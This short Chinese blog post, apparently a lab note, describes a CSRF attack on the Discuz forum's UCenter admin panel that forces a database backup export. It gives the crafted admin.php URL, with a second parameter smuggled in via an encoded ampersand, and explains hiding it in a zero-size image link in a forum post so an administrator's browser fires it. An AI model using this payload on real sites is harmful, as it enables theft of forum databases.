Discuz论坛-CSRF脱库 通过构造如下请求,通过发帖插入超链接的方式进行 1http://192.168.187.145/DZ/upload/uc_server/admin.php?m=db&a=operate&t=export&appid=1&backupdir=xxxx%26backupfilename%3Daaaa 管理员用户发送的备份请求通过插入图片超链接的方式,添加payload,宽高均设置为0: Discuz论坛-CSRF脱库 http://yoursite.com/2024/12/07/Discuz论坛-CSRF托库/ Author John Doe Posted on December 7, 2024 Licensed under DVWA Previous 复制 Next
